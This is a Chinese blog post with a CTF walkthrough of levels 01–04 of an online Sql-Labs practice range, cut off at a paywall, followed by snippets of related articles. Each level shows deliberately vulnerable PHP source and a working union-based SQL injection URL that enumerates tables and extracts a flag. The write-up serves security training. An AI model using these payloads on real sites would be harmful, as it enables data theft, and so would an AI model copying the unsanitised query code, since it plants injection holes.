【封神台】Sql-Labs wp

最新推荐文章于 2024-07-28 12:17:00 发布
最新推荐文章于 2024-07-28 12:17:00 发布
阅读量482 收藏 1
点赞数
分类专栏: CTF 技术学习 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35938621/article/details/119716044
版权
本文详细介绍了在Sql-Labs靶场中从pass-01到pass-17的各种SQL注入技巧,包括显错注入、联合查询、报错注入、时间盲注等,通过实例演示如何判断字段数量、解码ASCII码获取数据,以及如何应对各种过滤和编码。同时,文章结尾提供了作者的个人博客链接。
摘要由CSDN通过智能技术生成

前言

  • 掌控安全里面的靶场Sql-Labs,练练手!
  • 环境:http://inject2.lab.aqlab.cn:81/

pass-01

$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='.$id;
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
     
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 显错注入、先判断多少个字段

image-20210725131955354

image-20210725132104676

  • 查表拓展: 1 and exists(select * from user)这种形式可以猜解表是否存在
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();

image-20210725132232796

  • 查flag表中字段
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167; 
//0x6572726f725f666c6167是error_flag的十六进制

image-20210725132608204

  • 拿flag //后面就不截图了
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;

image-20210725132743133

pass-02

$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='\''.$id.'\'';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
     
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 给id传参加了个单引号,和上题一样的做法差不多,就是1后面加个’来闭合源代码中的单引号,再加个#号url编码也就是%23注释掉后面的单引号,也就可以联合查询了
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union all select 1,2,flag from error_flag %23;

image-20210725133156333

pass-03

sername = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='(\''.$id.'\')';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
     
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 上题id是’id’这题是加了个括号(‘id’),不过意思不变,同样是进行构造’)在1后面然后利用注释符#来绕过也就是%23
http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1') union all select 1,2,flag from error_flag %23;

image-20210725134152613

pass-04

$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=("'.$id.'")';
mysqli_select_db($conn,'****');// 不想让你们知道库名
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){
     
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
  • 单引号变双引号
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union all select 1,2,flag from error_flag %23;

image-20210725134258334

pass-05

$username = $_POST['username'];
$password = $_POST['password'];
$sql
最低0.47元/天 解锁文章
孤桜懶契
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
神台】数据库注入 wp
孤桜懶契
08-15 413
前言 掌控安全里面的靶场前端渗透/XSS,学习一下! 反射型XSS 环境:http://b-ref-xss-1s.lab.aqlab.cn/ 了解一下 一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了 XSS一般在什么业务场景容易遇见? 重灾区:评论区、留言区、个人信息、订单信息等。 针对型:站内信、网页即时通讯、私信、意见反馈。 存在风险:搜索框、当前目录、图片属性等。 遵循一个原则,见框就X 发现并没有什么反应,审计元素看看代码F12
sql-labs wp
qq_63267612的博客
02-11 2923
做题前了解了下基本的注入语句 1.order by 4 -- - 判断有多少列 union select 1,2,3 -- - 判断数据显示点 union select 1,user(),database()­­ -- - ­显示出登录用户和数据库名 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 -- - 查看数据库有哪些表
神台】无WAF的SQL注入
qq_63806300的博客
12-17 1724
神台SQL注入
SQL注入漏洞_神台第一关
gou1791241251的博客
12-13 754
SQL注入漏洞_神榜第一关 http://59.63.200.79:8003/?id=1 一、观察疑似可注入点 ?id=1 二、尝试输入单引号和双引号 使用hackbar进行测试比较好 以下是正常显示的结果 以下是输入单引号或双引号的结果 输入单引号时发现页面的内容不见了。同样试试双引号 同样也是一样的结果。在输入–+注释后面的SQL代码时还是同样的页面显示。由此可以判定这一关是数字型注入。那么可以测试一下把双引号或单引号去掉试试看 此时发现页面是正常显示的。如第一张图片。 验证了这个是数字型注入。
sql-labs1
Braindance
02-28 321
前言 在线靶机地址:https://buuoj.cn/challenges#sqli-labs less-1 ​ 首先说明sql注入的大致步骤: 判断注入类型。如整型字符型注入等。 判断列数 判断数据的回显位 构造sql语句 ​ 根据题目提示,说明是一个单引号注入题目,构造一个带单引号的语句?id=1',发现数据库报错 ​ 通过后面的报错语句1'' LIMIT 0,1的分析,我们的单引号被数据库解析,那么说明我们也可以使用连接查询union插入我们想要查询的语句。 ​ 推出数据库的查询的部分语句可能.
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL-labs/less1通关教程
02-29
### SQL-labs/less1通关教程详解 #### 一、理解GET传参方式与SQL注入基础 本节介绍的是如何通过GET方式传递参数来进行SQL注入的基础操作。在Web开发中,GET请求通常用于向服务器发送数据,这些数据会被附加在URL...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
搭建自己的SQL-labs靶场
sparrow_fly_2021的博客
08-04 1111
搭建自己的SQL-labs靶场
渗透测试面试题总结
热门推荐
0x536d72的博客
11-25 4万+
渗透测试常见面试题
mysql 绕过addslashes_魔术引号、addslashes和mysql_real_escape_string的防御以及绕过
weixin_39598501的博客
01-19 1107
0x00:php内置过滤函数php有内置的函数用来防御***,简单的介绍几个函数。魔术引号当打开时,所有的 '(单引号),"(双引号),\(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。一共有三个魔术引号指令:magic_quotes_gpc 影响到 HTTP 请求数据(GET,POST 和 COOKIE)。不能在运行时改变。在 PHP ...
floor报错注入的两种格式
aitong的博客
01-31 465
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
sqli-labs通关wp
D-R0s1的博客
04-11 6493
第一关: 方法一:在id=1后面加一个单引号后发现报错 然后把这个单引号注释掉试一下 使用'or 1=1--+ order by 查列数页面显示正常了。存在注入,先查一下列数 http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+ 使用单引号闭合掉一个单引号,在用--+或#或%27注释掉一个,便可以使中间的order...
网安学习之SQLLabs靶场1-16WP
最新发布
Freshman2273的博客
07-28 812
1.outfile的作用为导出,依靠这个参数,但这个参数为none不让你导出,除非对方项目有需求进行过更改不然此漏洞无法生效,还有一个重要的点,我们压根不知道对方的网站物理路径。1.使用单引号进行尝试,发现2次回显不同,说明是get传参,单引号闭合。后面不再展示,过程同第一关,只不过是在1’后加’)’单引号尝试成功,猜测是字符型,结果也确实如此。判断字段数,输入到4时报错,常见的3字段。发现’#’被过滤,换’--+’进行尝试。
Django authenticate(username=name,password=password)返回None的可能原因
qq_35968173的博客
07-15 1759
今天在根据网上教程学习django时由于并没有完全根据教程代码走遇到authenticate校验返回None找了好久总算找到原因。 1.对象需要使用model.objects.create_user()创建 密码由set_password()方法会生成哈希串,如果由model.objects.create()密码会是明文的。使用该校验方法自然为None. 2.model.is_active需要是True 否则后续版本django也会为None,解决办法在settings中加入 AUTHENTICATION_
天天生鲜 登录基本逻辑 user = authenticate(username=username, password=password)一直返回None
Nancy 博客
08-16 2461
问题描述 Python3.5 + Django2.2 天天生鲜项目在【4-01_登录基本逻辑】一节中user = authenticate(username=username, password=password)返回结果都是None。 出错原因 让它不自动关联数据库的is_active。 解决方法 在settings.py文件里面加上如下代码: AUTHENTICATION_BACKENDS =...
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面(https://github.com/Audi-1/sqli-labs)下载最新的 ZIP 文件,并将其解压缩到您的 Web 服务器的文档根目录中。 3. 在 MySQL 数据库中创建一个新的数据库,用于存储 SQL-Labs 的数据。您可以使用以下命令在 MySQL 命令行中创建一个新数据库: ``` CREATE DATABASE sqli; ``` 4. 导入 SQL-Labs 的数据库结构。进入到您解压缩的 SQL-Labs 文件夹中,找到 `db-structure.sql` 文件,并使用以下命令导入数据库结构: ``` mysql -u your_username -p sqli < db-structure.sql ``` 替换 `your_username` 为您的 MySQL 用户名,并输入密码进行验证。 5. 配置 SQL-Labs。进入 SQL-Labs 文件夹中的 `db.php` 文件,按照注释中的提示修改数据库连接信息,包括主机名、用户名、密码和数据库名称。 ``` $host = 'localhost'; $user = 'your_username'; $password = 'your_password'; $db = 'sqli'; ``` 6. 启动 Web 服务器,并在浏览器中访问 SQL-Labs。在浏览器中输入 `http://localhost/sql-labs/`,您应该能够看到 SQL-Labs 的登录页面。 现在,您已经成功安装并配置了 SQL-Labs。请确保仔细阅读项目的文档,了解如何正确使用和利用 SQL-Labs 的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤桜懶契

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值